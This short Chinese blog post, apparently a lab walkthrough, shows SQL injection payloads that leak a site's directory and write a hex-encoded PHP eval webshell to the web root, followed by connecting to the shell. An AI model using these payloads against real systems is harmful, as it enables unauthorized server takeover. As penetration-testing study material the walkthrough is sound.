首页 > 数据库 >SQLGetShell

SQLGetShell

时间:2023-02-04 20:35:27浏览次数:41  
标签:shell SQLGetShell 0x7e submit phpStudy null

SQLGetShell

利用sql注入来上传我们的木马后门,连接得到服务器shell

确定注入点

1651756830304

得到网站目录

user='and updatexml(1,concat(0x7e,@@basedir,0x7e),0) --+&password=asdf&code=5c23&submit=true&submit.x=32&submit.y=22

1651756895265

存在目录结构:D:/phpStudy/MySQL/

传木马:

1' un union ion seselectlect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e   in into outoutfilefile 'D:/phpStudy/WWW/bees/shell.php' -- a

<?php @eval($_POST[cmd]);?>

1651757089614

上传成功

1651757207980

1651757175685

用菜刀连接

1651757270536

成功

标签:shell,SQLGetShell,0x7e,submit,phpStudy,null
From: https://www.cnblogs.com/crabin/p/17092302.html

相关文章